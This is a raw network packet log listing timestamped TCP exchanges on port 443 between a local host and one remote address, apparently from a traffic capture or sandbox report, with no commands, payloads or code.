Jun 14, 2024 15:15:06.117234945 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117243052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.117273092 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117280960 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117394924 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.117409945 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.117459059 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117468119 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.117511988 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.118607044 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118633032 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118681908 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118685961 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.118694067 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118711948 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118727922 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.118762016 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.118767023 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.118803978 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119043112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119060040 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119112968 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119122028 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119162083 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119201899 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119220018 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119257927 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119265079 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119302034 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119303942 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119303942 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119313955 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119332075 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119353056 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119383097 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.119389057 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.119429111 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120577097 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120610952 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120667934 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120671034 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120687008 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120711088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120732069 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120742083 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120754004 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120770931 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120765924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120788097 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120795012 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120819092 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120820045 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120843887 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120845079 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120893955 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120902061 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120929956 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.120933056 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.120975971 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.123817921 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.423513889 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.423558950 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.423700094 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.423978090 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.423993111 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.034791946 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.036829948 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.036864996 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.181833982 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.181879044 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.181912899 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.181953907 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.181956053 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.181971073 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182014942 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.182023048 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182056904 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182071924 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.182076931 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182111025 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182121992 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.182127953 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.182176113 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.298278093 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298340082 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298369884 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298415899 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.298444986 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298490047 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298508883 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.298515081 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298549891 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298558950 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.298563957 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.298615932 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.299377918 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.299443007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.299475908 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.299485922 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.299489975 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.299532890 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.299998999 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300056934 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300103903 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.300110102 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300410032 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300437927 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300458908 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.300465107 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300512075 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.300890923 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300946951 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.300996065 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.301002026 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.349176884 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.414652109 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414863110 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414892912 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414917946 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414932966 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.414943933 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414974928 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.414992094 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.415019035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.415023088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415345907 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415373087 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415395975 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.415397882 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415409088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415438890 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.415911913 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415952921 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.415960073 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.415963888 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.416002035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.416671038 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.416716099 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.416727066 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.416732073 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.416762114 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.416779995 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.417865992 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.417911053 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.417927980 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.417932034 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.417943954 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.417958975 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.417979002 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.417983055 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418005943 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.418726921 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418764114 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418782949 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.418787956 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418802023 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418819904 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.418858051 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.418862104 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.418904066 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.531716108 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.531775951 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.531797886 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.531824112 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.531838894 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.531872034 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.531883001 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.531933069 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.531997919 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532058001 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532072067 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532120943 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532211065 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532306910 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532624006 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532679081 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532707930 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532710075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532721996 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532752037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532757998 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532758951 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532780886 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532799959 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.532807112 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.532841921 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533401012 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533438921 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533480883 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533492088 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533497095 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533518076 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533544064 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533544064 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533557892 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533565998 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533571005 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.533602953 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.533643961 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.534535885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.534573078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.534609079 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.534641981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.534673929 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.534673929 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.534679890 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.534693956 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.534693956 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.534722090 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535495996 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535557032 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535561085 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535569906 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535608053 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535626888 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535648108 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535651922 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535677910 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535681963 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535742044 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.535748005 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.535794973 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.536714077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.536787033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.536870003 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.536946058 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.536964893 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.537025928 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.573827028 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.574001074 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.647919893 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.647974014 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648030043 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648058891 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648076057 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648113966 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648505926 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648578882 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648580074 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648606062 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648638010 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648659945 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648794889 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648809910 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648890972 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.648900986 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.648946047 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.652724981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.652739048 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.652832985 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.652842045 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.652884007 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.653107882 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653121948 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653175116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.653182030 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653220892 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.653529882 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653543949 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653595924 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.653603077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.653649092 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.654345036 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654361963 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654411077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654417992 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.654424906 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654441118 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654448032 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.654473066 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.654479980 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.654498100 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.654520988 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.655127048 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655142069 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655196905 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.655204058 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655215979 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655231953 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655246019 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.655252934 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.655284882 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.655311108 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.656066895 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656080008 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656150103 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.656157017 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656197071 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.656228065 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656239986 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656286955 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.656296015 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.656332016 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.656349897 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.657087088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.657100916 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.657157898 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.657166004 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.657207966 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.689888954 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.689904928 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.690073013 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.690102100 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.690248966 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.764447927 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764471054 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764605045 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.764636040 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764703989 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.764811993 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764830112 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764883995 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.764892101 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.764931917 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765042067 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765058994 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765115976 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765122890 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765163898 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765347004 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765362978 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765420914 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765428066 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765470982 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765657902 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765680075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765738010 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.765746117 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.765786886 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766021967 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766042948 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766117096 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766125917 CEST	443	49708	188.114.97.3	192.168.2.8
